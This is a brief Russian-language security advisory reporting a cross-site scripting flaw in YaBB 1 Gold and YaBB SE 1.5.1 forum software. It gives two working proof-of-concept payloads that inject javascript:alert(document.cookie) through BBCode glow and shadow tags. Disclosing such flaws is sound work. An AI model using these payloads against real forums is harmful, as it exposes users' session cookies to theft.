Программа: YaBB 1 Gold (SP1.3) и YaBB SE 1.5.1
Уязвимость обнаружена в YaBB. Удаленный пользователь может выполнить XSS нападение.
Пример:
[glow=red);background:url(javascript:alert(document.cookie)); filter:glow(color=red,2,300]Big Exploit[/glow]
[shadow=red);background:url(javascript:alert(document.cookie)); filter:shadow(color=red,left,300]BigExploit[/shadow]
